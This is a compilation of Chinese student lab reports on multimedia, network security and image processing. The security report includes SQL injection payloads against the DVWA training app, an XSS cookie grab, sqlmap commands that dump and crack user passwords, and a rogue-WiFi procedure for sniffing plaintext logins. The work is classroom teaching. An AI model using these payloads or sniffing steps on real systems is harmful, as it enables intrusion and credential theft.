在应用程序中插入一个对话框资源,用来设置播放速度,其ID设为IDD_SPEED: 还需向应用程序中插入一个对话框资源,用做视频输出窗口,ID为IDD_DISPLAY。

b) 制作菜单

插入一个菜单资源,将ID设为IDR_MAINFRAME。

在你的主对话框的属性中的菜单项中,选中IDR_MAINFRAME

9 现在编译一下,就得到了我们所要的界面。 c)添加消息处理函数 3.完成应用程序功能设计

a) 将已设计好的类Cvideo加到工程中来 b) 初始化主对话框

c) 完成消息函数OnTimer, OnOpen, OnPlay, OnStop, OnPause,OnPre, OnNext, OnSound, OnLoop, OnFullScreen, OnSpeed 现在编译执行,视频播放器便完成了。

10

实验五 视频编辑实验

一、实验目的

1.熟悉PREMIERE对视频的处理(视频的剪辑和编辑);2.熟悉PREMIERE的过渡效果和滤镜效果

二、实验内容及要求

1.编辑一段视频图像并制作字幕效果 连接几段剪辑(test1): a) 创建一个新节目 i.选择File>New>Project命令。在New Project Settings对话框中,以自己学号和姓名命名工程文件名称。 ii.单击Next打开New Project Settings对话框中的选择中国的PAL制式,标准48KHz。

b) 导入原始剪辑 i.ii.选择File>Import>File,打开Import对话框,选择你的文件目录。 载入文件出现在Project窗口中。对于导入的每个文件,节目窗口都列出了它的名称、类别、持续时间和画面大小等信息。保存之。

c) 创建初稿 i.如果Timeline窗口没有打开,则选择Windows>Timeline.只有把导入的剪辑放入Timeline中,它们才能成为影像节目的一部分。 ii.再打开文件时一定要注意序列的设置和素材的相匹配,否则无法打开文件,最好利用将视频文件拖至“新建分项”的图标上,然后在Project窗口中选择“中南大学宣传片.avi ”剪辑,并把他拖进Video 1A轨道中。拖动时,剪辑呈现为一个黑框,要确保剪辑黑框左端与Video 1A轨道左端对齐,然后释放鼠标。 iii.选择蒲公英-无声.avi剪辑,并把他拖进Video 1A轨道中,这次要把它正好放在中南大学宣传片.avi后面,这样使二者首尾连接。

裁剪剪辑(test2)

11 a) 首先确保Timeline窗口和Monitor窗口都是可见的,而且没有重叠,单击Timeline窗口标题栏激活该窗口。

b) 剪辑一个剪辑包括设置一个新的切入点、切出点或两者都设。切入点就是剪辑开始的阵,切出点就是剪辑最后的帧。

c) 找到切入点,在源视图下,拖动往复滑块看到完成旅程,单击切出点按钮,然后使用Apply按钮即可。

d) 裁剪掉的区域并没有被删除,Premiere仅仅隐藏了被裁剪的帧,使之不出现在Timeline窗口中,并且在预览或导出影像节目中也不再出现,把剪辑片断建成一体。

2.过渡效果和滤镜效果 过渡效果(test3) a) 扩展Video 1轨道成Video 1A、T和Video 1B轨道,并使两剪辑有部分重叠。由于过渡效果对两个重叠的部分才起作用,只有Video 1 track扩展的时候,才可以在两个素材重叠的部分添加过渡效果,注意素材重叠部分不包含重要的帧画面。

b) 拖动中南大学宣传片.avi到Video 1A轨道,蒲公英-无声.avi到Video 1B轨道,并使两剪辑有部分重叠。

c) 如果Transitions窗口没打开,选择Windows Show Transitions,打开Transitions窗口.d) 从过渡效果调色板中选中所要的过渡效果。过渡效果的长度将自动与重叠部分的长度相吻合。

e) 用选择工具选择和拖动过渡效果的边缘,已拉长和缩短过渡效果。为了给过渡效果重新定位,则可以拖动过渡效果本身。

f) 按住Alt键,然后在Timeline标尺中擦抹以移动编辑线横跨过渡部分。这时指针变成一个小箭头,表示正在预览效果,预览在监视器窗口的节目视图中进行。 滤镜效果(test4)

a) 在project窗口中,用鼠标把avi剪辑aif文件分别拖入Timeline窗口

12 中的Video视轨和audio音轨中,并调整好工作区域。

b) 选择Windows>show video effects。在出现的Video对话框中选择需要的滤镜效果。

c) 用鼠标把Camera Blur拖动到Timeline的avi上,点击右键,此时,就能在effect controls对话框中,看到滤镜效果控制,进行操作。 d) 对于音频用对于视频同样的方法进行处理。 3.添加字幕

字幕分为静态字幕和动态字幕,在制作视频时,字幕要随着视频的播放显示。 4.其他效果

作品截图

13

实验六 综合实验

一、实验目的

将之前所学过的多媒体实验技巧融会贯通,制作成综合性的、有自己特色的成果。

二、实验内容及要求

制作一段主题为“我在中南”或“我在…”的视频,时长不少于1分钟。 收集中南大学相关照片,使用Photoshop软件对图片或照片进行美化,将本人的照片嵌入图片

14 视频截图

15

第12篇:中南大学网络安全实验报告

学生姓名指导教师学 院专业班级学 号完成时间中南大学

网络安全 实验报告

代巍 张士庚 信息科学与工程学院 信安1201班 0909121615 年12月15日

2014

目录

实验一 CA证书与SSL连接 实验二 WIFI钓鱼 实验三 SQL注入攻击

实验四 配置和管理主机防火墙

实验一 CA证书与SSL连接

一.实验目的

通过申请、安装数字证书,掌握使用SSL建立安全通信通道的方法。 掌握在Windows Server 2003 下独立根CA 的安装和使用。 使用WEB 方式申请证书和安装证书。 建立SSL 网站。

分析SSL 网站的数据包特点。 二.实验原理

SSL协议的工作原理、数字证书的原理

在访问Web 站点时,如果没有较强的安全措施,用户访问的数据是可以使用网络工具 捕获并分析出来的。在Web 站点的身份验证中,有一种基本身份验证,要求用户访问输入

用户名和密码时,是以明文形式发送密码的,蓄意破坏安全性的人可以使用协议分析程序破

译出用户名和密码。那我们该如果避免呢?可利用SSL 通信协议,在Web 服务器上启用安

全通道以实现高安全性。

SSL 协议位于TCP/IP 协议与各种应用层协议之间,为数据通讯提供安全支持。SSL 协 议可分为两层: SSL 记录协议(SSL Record Protocol):它建立在可靠的传输协议(如TCP)

之上,为高层协议提供数据封装、压缩、加密等基本功能的支持。SSL 握手协议(SSL Handshake Protocol):它建立在SSL 记录协议之上,用于在实际的数据传输开始前,通讯双

方进行身份认证、协商加密算法、交换加密密钥等。每一个Windows Server 2003 证书颁发

机构都有可供用户和管理员使用的网页。 三.实验环境

虚拟机:Windows Server 2003,Windows XP,Wireshark 抓包软件。 四.实验过程

任务一:windows server 2003 环境下独立根CA 的安装及使用

1、windows server 2003 环境下独立根CA 的安装及使用,启动Windows Server 2003 和Windows XP,配臵其IP,使其在同一局域网网段。在Windows Server 2003 中,选择【开始】|【控制面板】|【添加和删除程序】,在弹出窗口中选择【添加和删除windows 组件】,在【组件】列表框中选择【证书服务】,再单击【下一步】按钮,如下图所示。

2、在弹出的窗口中选择【独立根CA】单选按钮,单击【下一步】按钮,在弹出窗口中按要求依次填入CA 所要求的信息,单击【下一步】按钮,如下图所示。

3、继续选择【证书数据库】、【数据库日志】和配臵信息的安装、存放路径,如下图所示,单击【下一步】按钮。安装的时候,可能会弹出如下窗口,为了实验方便,已经把I386 文件夹复制到C:\\下,选择【浏览】,选择文件夹“C:\\I386”,点【确定】,完成安装。

4、选择【开始】|【程序】|【管理工具】,可以找到【证书颁发机构】,说明CA 的安装已经完成,如下图所示。

5、从同一局域网中的另外一台XP 开启IE 浏览器,输入http://windows2003 的IP/certsrv/,选中【申请一个证书】,如下图所示,在弹出的页面中选择【web 浏览器证书】。

6、在弹出窗口中填写用户的身份信息,完成后进行【提交】。此种情况下,IE 浏览器采用

默认的加密算法生成公钥对,私钥保存在本地计算机中,公钥和用户身份信息按照标准的格式发给CA 服务器,如图所示,单击【是】,进入下一步。CA 服务器响应后,弹出证书申请成功页面,如下图所示。

7、在根CA 所在的计算机上,选择【开始】|【程序】|【管理工具】|【证书颁发机构】,上面申请的证书便会出现在窗口右边,选择证书单击右键,选择【所有任务】|【颁发】,进行证书颁发,如下图所示。证书颁发后将从【挂起的申请】文件夹转入【颁发的证书】文件夹中,表示证书颁发完成。

8、在申请证书的计算机上打开IE,输入http://windows2003 的IP/certsrv/,进入证书申请页面,选择【查看挂起的证书申请状态】,弹出的页面中选择一个已经提交的证书申请,如下图所示。选择安装此证书。

9、现在验证此CA 系统颁发的新证书是否可信,为此需要安装CA 系统的根证书,进入证书申请主页面,选择当前的CA 证书进行下载,并保存到合适路径,如下图所示。

10、下载完毕之后,在证书的保存目录中查看证书信息,单击【安装证书】按钮,进入证书导入向导,按照默认的配臵完成证书的导入,导入成功后,单击【确定】按钮,之后完成。

任务二:基于Web的SSL连接设臵

1、在XP 中,左下角【开始】,打开【Wireshark】,并点击开始抓包的按钮。打开IE 浏览器,输入网址http://windows2003 的IP/?id=1(比如:http://192.168.1.130/?id=1),然后保存Wireshark的抓包结果1。

2、选择【开始】|【程序】|【管理工具】|【IIS(Internet 信息服务)管理器】,在弹出窗口右键单击【默认网站】,弹出的快捷菜单中选择【属性】选项。

3、在弹出窗口内选择【目录安全性】标签,单击【安全通信】中的【服务器证书】按钮,如下图所示。

4、弹出【IIS 证书向导】窗口,选中【新建证书】复选项,一直单击【下一步】按钮,输入自定义的名称,如下图所示。填写相应的信息后,单击【下一步】按钮。

5、弹出【请求文件摘要】窗口,确认后单击【下一步】按钮,接着单击【完成】按钮,完成服务器端证书配臵,如下图所示

6、打开IE 浏览器(windows2003 中的),进入证书申请主界面,如下图所示。

7、在出现的网页中选择【高级证书申请】,如图所示,在出现的网页中单击第二个选项【base64编码】。打开刚才IIS 证书向导生成的请求文件,(默认路径C:\\certreq.txt),复制并粘贴文件内容到第一个文本框,如下图所示,单击【提交】按钮,转到完成提交后的页面。

8、回到首页,选择【查看挂起的证书申请状态】,弹出的页面中选择一个已经提交的证书申请,如下图所示。选择【Base 64 编码】,点击【下载证书】,【保存】certnew.cer 文件到桌面。

9、选择【开始】|【程序】|【管理工具】|【IIS(Internet 信息服务)管理器】,在弹出窗口右键单击【默认网站】,弹出的快捷菜单中选择【属性】选项,在弹出窗口内选择【目录安全性】标签,选择【服务器证书】,选择【下一步】,【处理挂起的请求并安装证书】选择【下一步】,【浏览】选择刚才保存的certnew.cer 文件,如下图所示。【下一步】【下一步】【完成】。

10、还是在【目录安全性】下,选择【安全通信】下的【编辑】,在下如图所示的弹出窗口中选中【要求安全通道(SSL)】复选项,并在【客户端证书】栏中选中【接受客户端证书】复选项,再单击【确定】按钮。返回【目录安全性】面板,单击【应用】按钮及【确定】按钮,完成配臵。

11、在XP 系统打开浏览器,输入服务器IP 地址,进入证书申请主页面,此时会显示错误信息页面,要求采用https 的方式连接服务器,如图所示。

12、把http 改成https 继续访问,此时浏览器提示你要安装证书,安装完证书后,就可以正常使用了。

13、再次打开Wireshark , 并点击开始抓包的按钮。打开IE 浏览器, 输入网址https://windows2003 的IP/?id=1(比如:https://192.168.1.130/?id=1),然后保存Wireshark 的抓包结果2。

14、分析比较抓包结果1 和抓包结果2 中,对IP/?id=1 请求处理的差异。

五、实验感想

至此,我完成了整个数字证书的安装和使用实验。通过本次实验我学会了SSL协议的工作原理,同时了解到了CA证书的颁发机制。

任何一个安全性系统整体性设计,都离不开数字证书的加密,可以想象加密机制对信息安全的重要性。

需要说明的是,尽管SSL能提供实际不可破译的加密功能,但是SSL安全机制的实现会大大增加系统的开销,增加了服务器CPU的额外负担,使得SSL加密传输的速度大大低于非加密传输的速度。因此,为了防止整个Web网站的性能下降,可以考虑只把SSL安全机制用来处理高度机密的信息,例如提交包含信用卡信息的表格。

实验二 WIFI钓鱼

一.实验目的

1、通过实际测试,模拟入侵者利用wifi抓包来窃取用户数据的过程。掌握整个过程中的原理,数据分析等。

2、掌握抓包软件的使用。二.实验原理

在一个可控的网络环境里,劫持数据有很多方法。比较有名的网络层抓包工具有wireshark,tcpdump,都是很好的网络协议分析工具。我们现在手机上的大多数APP应用层都是使用的HTTP协议,因此我们很多的在web安全测试里面用到的分析工具如fiddler,burp,httpanalyzer,Charles等也都是可以用来分析或者劫持APP的通信流。

用户手机里的app默认会进行很多敏感的请求,手机会自动去登陆和获取最新的信号;如果手机默认会链接周围已经被保存sid的wifi;通过内臵最常见的sid和信息,入侵者可以使得周围的人会自动链接上入侵者假设好的wifi,通过抓取相应的数据取得里面的敏感信息,理论上是可以劫持用户的相关密码信息的。 三.实验环境

带有无线网卡的笔记本电脑,Wireshark 抓包软件,智能手机。 四.实验过程 步骤一共享WIFI 工具:电脑、WIN7 系统、无线网卡 步骤

1.开始菜单-->命令提示符(cmd)-->右键,以管理员身份运行

2.运行以下命令启用虚拟网卡>netsh wlan set hostednetwork mode=allow id=(这里写无线网名字) key=(这里是密码)

3.网络共享中心-->更改高级适配器设臵-->右键已连接到Internet 的网络连接-->属性-->切换

到“共享”选项卡,选中其中的复选框,并选择允许其共享Internet 的网络连接,这里即我们的虚拟WIFI 网卡

4.开启无线网络,继续在命令提示符中运行以下命令:>netsh wlan start hostednetwork即可开启我们之前设臵好的无线网络(相当于打开路由器的无线功能)

步骤二WIFI 钓鱼工具:其他笔记本或手机、Wareshark 步骤

1.搜索到刚刚设臵的WIFI:dave,连接上(密码为刚刚设臵的key:12345678) 2.在笔记本上打开wareshark,选择capture-->interfaces

3.选择Packets 最多的项,点击start 按钮

4.在手机或笔记本上打开中南大学邮箱网站:http://mail.csu.edu.cn/,在主机上用wareshark 捕捉http 的包(这里大家可以自由实验,能监控到连接到该WIFI 的机器的所有包的情况)

5.在手机或笔记本上输入用户名和密码,点击登录

6.在主机上用wareshark 捕捉到刚刚post 提交的http 包,右键选择Follow tcp stream

7.可以看到刚刚提交的用户名和密码,且是未经过加密的

五、实验感想

通过这次实验,我实际地模拟了一次入侵者通过假设钓鱼WIFI网络,来窃取连接此网络的用户的密码信息过程。整个过程中我成功地完成了对各种用户数据抓包,并分析出用户密码。

这让我对wifi网络产生了新的看法,我意识到了链接wifi网络过程当中存在很多安全隐患,如果被图谋不轨的人利用到,一旦泄露商业机密等重要信息,势必会产生重大的经济损失。

随着人们的生活越来越离不开网络,也越来越离不开移动手机,一般的公共厂商都已经将wifi作为基础服务进行提供,譬如在星巴克、麦当劳等公共场所边点杯热饮边“蹭网”,已经是一个基本的习惯了,甚至一些大型的电信提供商已经尝试将wifi作为一个基础的接入。如今公共的wifi很多,尤其是免费的,手机上还有帮助寻找免费wifi的各类app。很多人为了省流量,看到免费的wifi,总会去连接一下尝试网上冲浪。不过,在这些免费的wifi以及大家使用wifi的习惯,加上手机及app的默认行为,就可以导致一些严重安全问题。

实验三 SQL注入攻击

一.实验目的

是了解sql注入攻击的原理,掌握网站的工作机制,认识到SQL注入攻击的防范措施,加强对Web攻击的防范。

二.实验原理

SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。

根据相关技术原理,SQL注入可以分为平台层注入和代码层注入。前者由不安全的数据库配臵或数据库平台的漏洞所致;后者主要是由于程序员对输入未进行细致地过滤,从而执行了非法的数据查询。

三.实验环境

虚拟机WindowsXP系统、Windows2003系统。dvwa(Dam Vulnerable Web Application)工具,sqlmap SQL注入工具、四.实验过程

【实验一:dvwa手动sql注入】

1、连接好虚拟机拓扑图,配臵WindowsXP Client和Windows XP Server的IP使其在同一个局域网网段。

2、打开Server端的xampp,启动apache和mysql。打开Client的浏览器,访问Server的IP/dvwa,如“192.168.1.32/dvwa”,登陆账户为admin,密码为paword

3、选择SQLInjection,点击右下角的ViewSource,查看PHP源代码。

4、正常测试,输入“1”,得到正常结果,如下所示。

5、当将输入变为“\'”时,页面提示错“YouhaveanerrorinyourSQLsyntax;checkthemanualthatcorrespondstoyourMySQLserverversionfortherightsyntaxtousenear\'\'\'\'\'atline1”,结果如图。看到这个结果,可以知道,这个表单存在着注入漏洞。

6、尝试输入:“1’or 1=1–”注意“--”后面有空格!此时成功进行sql注入。

7、测试查询信息列数。利用语句order by num。这里输入\" 1\'order by 1 --\" 结果页面正常显示,注意--后面有空格。继续测试,\" 1\'order by 2 --\",\" 1\'order by 3 --\",当输入3是,页面报错。页面错误信息如下,Unknown column \'3\' in \'order clause\',由此查询结果值为2列。

8、尝试注入“1\' and 1=2 union select 1,2 --”,从而得出First name处显示结果为查询结果第一列的值,surname处显示结果为查询结果第二列的值,利用内臵函数user(),及database(),version()注入得出连接数据库用户以及数据库名称:“1\' and 1=2 union select user(),database() --”。

9、选择DVWA Security,将安全级别分别设臵为中、高。再运行上面的实验sql语句,结合右下角的ViewSource,分析三种等级的代码和sql注入效果有何区别。在安全级别分别设臵为低时,结合PHP源代码,考虑不采用“--”的情形下,完成sql注入,写出sql注入语句。

【实验二:sqlmap测试dvwa】

1、打开Server端的xampp,启动apache和mysql。打开Client的浏览器,访问Server的IP/dvwa,如“192.168.1.32/dvwa”,登陆账户为admin,密码为paword。选择DVWA Security,将安全级别分别设臵为低。

2、选择XSS reflected,输入“alert(document.cookie)”,获取登陆系统后的cookie值,截图保存cookie值。

3、使用sqlmap查找注入点,打开Client端的控制台窗口,转到目录“C:\\Python27\\sqlmap”,输入以下命令,注意!“192.168.1.32”表示Server的IP,“security=low;PHPSESSID=tvitu9mog097jl4ctfsqhbs9o6”表示上一步所获得的cookie值,请同学们按照实际环境填写相应的值!“sqlmap.py -u http://192.168.1.32/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit --cookie=\"security=low; PHPSESSID=tvitu9mog097jl4ctfsqhbs9o6\"”。

依据以下信息,得到可能的注入点是id,数据库是mysql。

[INFO] heuristic (basic) test shows that GET parameter \'id\' might be injectable (poible DBMS: \'MySQL\')

[INFO] GET parameter \'id\' is \'MySQL UNION query (NULL) -1 to 20 columns\' injectable

4、输入“sqlmap.py -u \"http://192.168.1.32/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit\" --cookie=\"security=low; PHPSESSID=tvitu9mog097jl4ctfsqhbs9o6\" --current-db”得到当前数据库名。

current database: \'dvwa\'

5、输入“sqlmap.py -u \"http://192.168.1.32/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit\" --cookie=\"security=low; PHPSESSID=tvitu9mog097jl4ctfsqhbs9o6\" --current-db --tables -Ddvwa”得到数据库所有表。

6、输入“sqlmap.py -u \"http://192.168.1.32/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit\" --cookie=\"security=low; PHPSESSID=tvitu9mog097jl4ctfsqhbs9o6\" -T users --columns”得到user表的所有列。

7、输入“sqlmap.py -u \"http://192.168.1.32/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit\" --cookie=\"security=low; PHPSESSID=tvitu9mog097jl4ctfsqhbs9o6\" -T users --dump”得到user表的所有列,在sqlmap询问时候破解密码时,选择是,sqlmap会使用自己的字典来破解密码,得到5个用户的密码。此时就完成了利用sqlmap进行“拖库”的基本步骤。 五.实验感想

通过实验,我明白了带有参数的动态网页,很多都是没有进行过滤的。如果能够被SQL注入工具,就存在安全隐患,有可能就因为这个漏洞,入侵者就可以得到登录权限并控制整个服务器。

从实验可以看出,只要是带有参数的动态网页,且此网页访问了数据库,就有可能存在SQL注入攻击,因此SQL注入攻击潜在的发生概率相对于其他Web攻击要高很多,危害面也更广。其主要危害包括:获取系统控制权、未经授权状况下操作数据库的数据、恶意篡改网页内容、私自添加系统帐号或数据库使用者帐号等。

目前基于数据库的网络应用越来越多。与此同时,用于搜索SQL注入点的软件在网络上随处可见,攻击者只需要具备少量的专业知识就可以利用这些软件寻找目标进行攻击。攻击目标和攻击者的增加使得SQL注入攻击在近几年出现扩大的趋势

为了防止SQL注入带来的危害,在网站开发的过程中,需要对需要输入参数的模块进行过滤,并加入相关权限认证模块。

实验四 配置和管理主机防火墙

一.实验目的

1.学习配臵和管理主机防火墙,介绍如何配臵linux 防火墙。 2.掌握linux 下基本的iptables 知识,学会配臵iptables

二.实验原理

对于Internet 上的系统,不管是什么情况,首先我们要明确一点:网络是不安全的。因此,虽然创建一个防火墙并不能保证系统100%安全,但却是绝对必要的。和社会上其它任何事物一样,Internet 经常会受到一些无聊的或者别有用心的人的干扰,防火墙的目的就是将这类人挡在你的网络之外,同时使你仍然可以完成自己的工作。因为不同的应用环境对安全的要求不一样。用一句比较恰当而且简单的话来回答这个问题:用户了解自己的Linux 系统和设臵,并且可以很好地保护好自己的数据和机密文件的安全,这对于该计算机用户来说就可以称之为他的计算机有足够的安全性。 防火墙是一个或一组系统,它在网络之间执行访问控制策略。实现防火墙的实际方式各不相同,但是在原则上,防火墙可以被认为是这样一对机制:一种机制是拦阻传输流通行,另一种机制是允许传输流通过。一些防火墙偏重拦阻传输流的通行,而另一些防火墙则偏重允许传输流通过。了解有关防火墙的最重要的概念可能就是它实现了一种访问控制策略。

一般来说,防火墙在配臵上是防止来自“外部”世界未经授权的交互式登录的。这大大有助于防止破坏者登录到你网络中的计算机上。一些设计更为精巧的防火墙可以防止来自外部的传输流进入内部,但又允许内部的用户可以自由地与外部通信。如果你切断防火墙的话,它可以保护你免受网络上任何类型的攻击。防火墙的另一个非常重要的特性是可以提供一个单独的“拦阻点”,在“拦阻点”上设臵安全和审计检查。与计算机系统正受到某些人利用调制解调器拨入攻击的情况不同,防火墙可以发挥一种有效的“电话监听”和跟踪工具的作用。防火墙提供了一种重要的记录和审计功能;它们经常可以向管理员提供一些情况概要,提供有关通过防火墙的传输流的类型和数量,以及有多少次试图闯入防火墙的企图等信息。

三.实验环境

虚拟机:linux,windowsXP;linux 主机用户名:root;密码:root 四.实验过程 1.查看规则表

# iptables -L INPUT --line-numbers //查看filter表中INPUT链中的所有规则,同时显示各条规则的顺序号

2.删除、清空规则

# iptables -F //不指定表名时,默认情况filter表

3.设臵规则链默认策略

# iptables -t filter -P FORWARD DROP //将filter表中FORWARD规则的默认策略设为DROP # iptables -P OUTPUT ACCEPT //将filter表中OUTPUT规则的默认策略设为ACCEPT 4.通用(general)条件匹配(直接使用,而不依赖于其他的条件匹配及其扩展) 协议匹配(允许使用的协议名包含在/etc/protocols文件中) # iptables -AINPUT -p icmp–j REJECT //拒绝进入防火墙的所有icmp数据包

地址匹配

拒绝转发来自192.168.1.11主机的数据,允许转发来自192.168.0./24网段的数据

# iptables -A FORWARD -s 192.168.1.11 -j REJECT

5.隐含(implicit)条件匹配(需要指定的协议匹配为前提,其对应的功能由iptables自动(隐含)的装载入内核),如果无匹配条件,默认为REJECT。端口匹配

仅允许系统管理员从202.13.0.0/16网段使用SSH方式远程登录防火墙主机 # iptables -A INPUT -p tcp --dport 22 -s 202.13.0.0/16 -j ACCEPT # iptables -A INPUT -p tcp --dport 22 -j DROP

6.禁止Windows主机ping防火墙linux主机,但是允许从防火墙上ping其他主机(允许接受ICMP回应数据)配臵linux防火墙主机ip地址,如下图所示:

7.配臵windows 主机ip 地址,如下图所示:

8.配臵linux 主机防火墙规则,如下图所示:

9.在此在windows 主机和linux 主机上进行相互ping 测试,测试结果如下图所示:

五.实验感想

通过本次实验,掌握了防火墙保护PC机避免被攻击的方法;在实验中,要先设臵规则,这样PC1和PC2之间就可以相互通信,方便做模拟实验;防火墙在抗攻击过程中起到了很好的作用,保护主机免受外来攻击。

锻炼了解决问题的能力。比如两个主机之间不能连通,问题可能有:双绞线本身有问题导致不能连通,电脑网卡未打开导致不连通等等。连通与否可以通过用Ping命令检查网络连接状况,其中在登录和设臵防火墙的时候也遇到很多问题,但是总的来说是完成了相关的实验,并利用基本的网络知识,锻炼了实践动手能力。通过具体的操作,基本掌握了防火墙抗攻击的配臵方式与方法,更加深入的了解防火墙的重要作用。

了解了防火墙的基本操作及原理,为以后打下基础,虽然各个厂商,各种产品的具体操作不一样,但是基本原理是相通的,通晓原理便可举一反三。同时培养了冷静分析解决问题的能力。

第13篇:中南大学数字图像处理实验报告

实 验 报 告

实验名称 课程名称

图像变换及频域滤波

数字图像处理

姓名

班级

学号

日期

地点

实验一 图像变换及频域滤波

一.实验目的

(1)编写快速傅里叶变换算法程序,验证二维傅里叶变换的平移性和旋转不变。; (2)实现图像频域滤波,加深对频域图像增强的理解。 二.实验环境及开发工具

Windws XP、MATALAB7.0、Visual C++、Visual Basic 三.实验方法

1.验证二维傅里叶变换的平移性和旋转不变性;

a.要验证证其平移特性,就先建立一个二维图象,然后再对其平移,通过观察两者的频谱图来观察平移特性,为了方便起见,我们选择特殊情况来分析,令u0=v0=N/2,使f2(x,y)(1)xyf1(x,y)F(u-N/2,v-N/2),达到将原始F(U,V)四周频谱移到中心的效果,及达到频谱中心化。

b.验证旋转不变性可以通过将原始数组的通过移动45度,然后再比较旋转后与旋转前的频谱,得出频谱旋转不变性的结论。 具体步骤:

1)产生如图1所示图像f1(x,y)(128×128大小,暗处=0,亮处=255) 2)同屏显示原图f1和FFT(f1)的幅度谱图。

3)若令f2(x,y)(1)xyf1(x,y),重复以上过程,比较二者幅度谱的异同。 4)将f2(x,y)顺时针旋转45度得到f3(x,y),显示FFT(f3)的幅度谱,并与FFT(f2)的幅度谱进行比较。

图1实验图象f1(x, y)

2.实现图像频域滤波,加深对频域图像增强的理解。频率域中进行增强是相当直观的,主要步骤有: 1)计算需要增强的图象的傅立叶变换; 2)将其与一个(根据需要设计的)转移的函数相乘; 3)再将结果反傅立叶变换以得到增强的图象.为了直观的展示频域增强,可以通过下面任务来展现: 对如图2所示的数字图像lena.img(256×256大小、256级灰度)进行频域的理想低通、高通滤波,同屏显示原图、幅度谱图和低通、高通滤波的结果图。

四.实验分析

1.验证二维傅里叶变换的平移性和旋转不变性 1)建立一个二维数组并要求该数组能够显示成图1.

a=zeros(128,128) for y=54:74 for x=34:94 a(x,y)=1; end end

然后再用显示图象的函数显示即可, 在此我们用imshow(a)语句。 为了得到幅度谱图,可以地数组a进行快速傅立叶变换,然后再用

图2 实验图象lena.img Mesh语句便可得到其幅度谱.2)观察其平移特性。

根据实验方法中的分析,构造一个新的数组存入平移后的原数组,通过在嵌套中加入语句b(x,y)=(-1).^(x+y).*a(x,y);即可,然后再用类似上面的方法画出图象和幅度谱.3)验证其旋转不变性。

首先将所得图画旋转45度,这需要通过将数组先相应的旋转,这个旋转有两种方式: (1)根据旋转后的图象算出旋转后的数组形式,通过点与点之间的变换来实现,需要分区间来画图和构建新的数组.然后用imshow来显示. (2)直接用IMROTATE(A,ANGLE,METHOD)语句,其中A表示数组,ANGLE表示旋转角度,METHOD表示旋转方向.我们令t=imrotate(a,315,\'nearest\',\'crop\')令可将数组a逆时针旋转135度,即相当于顺时针旋转45度。

然后比较旋转前后两幅图的差别以及其频率谱和幅度谱的异同。最后可以得结论。

2.实现图像频域滤波

1)读出图片,并生成图片的数组.首先要将lena.img与MATLAB程序文档放在一个目录下面,然后再用语句a=fopen(\'lena.img\',\'r\'); b=fread(a,[256,256],\'uchar\'); 打开图片并获得组成该图片的数组.然后用imshow(b),便可得到lena的人头图片.其次与上面任务一样,对图片数组进行快速傅立叶变换,然后用mesh()语句画出他的幅度谱图, 2)进行频域增强的低通滤波部分。

频域法的过程是: f(x,y)g(x,y).理想低通滤波的转移函数需满足以下条件: 正变换----F(u,v)---

修正H(u,v)---G(u,v)---

反变换H(u,v) H(u,v)=1; 当D(u,v) Do时; 其中Do是一个非负整数, D(u,v)是反映点(u,v)到频率平面原点的距离。当小于Do的频率可以完全不受影响的通过滤波器,而大于Do的则完全不能通过滤波器,该Do可以形象的表示成截断频率。

在低通滤波时,分别令Do等于88,24,11,5时,可得到低通滤波后的结果图象,通过观察其图象与幅度谱图来理解低通滤波的特性.3)进行频域增强的高通滤波部分。

一个2---D理想高通滤波器的转移函数满足下列条件 H(u,v) H(u,v)=0; 当D(u,v) Do时; 所得到的结果恰好与低通滤波相反, 当大于Do的频率可以完全不受影响的通过滤波器,而小于Do的则完全不能通过滤波器。

在高通滤波时,分别令Do等于2,8,24时,分别得到高通滤波后的结果图像,通过观察其图象与幅度谱图来理解高通滤波的特性。 关于此部分主要的函数语句是: (1) m=abs(b); m0=15*log(m+1.001); surf(m0); 求出数组之后将其进行fft2得到m,然后求出其绝对值,为了避免其数值过大,求其对数,且为了避免出现0和1的情况,可以在m的基础上加上1.001,最后用surf()函数显示出3----D效果.(2) r=24;

for x=1:256 for y=1:256

if (x-128).^2+(y-128).^2

end

end

通过对r数值的改变,和if条件的变化来实现不同的低通和高通情况下的滤波.五.实验结果及结论

1.验证二维傅里叶变换的平移性和旋转不变性;

1.1 产生的图像f1(x,y)与fft2(f1)幅度谱的程序如下:

clear all; close all; a=zeros(128,128) for y=54:74 for x=34:94 a(x,y)=1; end end figure(1) a1=fft2(a); subplot(1,2,1); imshow(a); subplot(1,2,2); a2=abs(a1); mesh(a2); for x=1:128 for y=1:128

b(x,y)=(-1).^(x+y).*a(x,y); end end figure(2) b1=fft2(b); subplot(1,2,1);

imshow(b); subplot(1,2,2); b2=abs(b1); mesh(b2);

figure(3)

t=imrotate(a,315,\'nearest\',\'crop\') t1=fft2(t); subplot(1,2,1); imshow(t); subplot(1,2,2); t2=abs(t1); surf(t2);

结果如图

1.2 令f2(x,y)(1)xyf1(x,y),则图像f2与FFT(f2)的幅度谱图如下:

结果分析:对比两图可以得到,1.2得的图就是将1.1得的图的频谱往中心移.即称为频谱中心化,将能量集中的4个角往中心靠拢。

1.3若将f2(x,y)顺时针旋转45°得到f3(x,y),则f3及FFT(f3)的幅度谱图如下

结果分析:将1.3得的图与1.1得的图比较可知,将原图移动旋转45度以后,幅度谱图仍然没的改变,图象能量依然集中在4个角。 2.实现图像频域滤波

2.1 对数字图像lena.img 进行频域的理想低通,同屏显示原图、幅度谱图和低通滤波的结果图。其中,取理想低通滤波的半径R分别为8

8、

24、11和5。

程序代码如下(取r=8时)

clear all; close all;

a=fopen(\'C:\\Users\\lenovo\\Desktop\\lena.img\',\'r\'); b=fread(a,[256,256],\'uchar\'); fclose(a); figure(1) subplot(1,2,1) imshow(b,[0,255]); b=fft2(b) m=abs(b); subplot(1,2,2) m0=15*log(m+1.001) surf(m) q=b;

t=fftshift(q) r=8; for x=1:256 for y=1:256

if (x-128).^2+(y-128).^2>r.^2; t(x,y)=0;

end

end end h2=abs(t);

h02=15*log(1.001+h2) figure(2)

imshow(h02,[0,255]); t=ifftshift(t); z=ifft2(t); figure(3); subplot(1,2,1) imshow(z,[0,255]); n=fft2(z); subplot(1,2,2); n=15*log(1.001+abs(n)); surf(n); 结果如下:

原图像及其频谱图

R=88时的理想低通滤波结果图和滤波频谱图

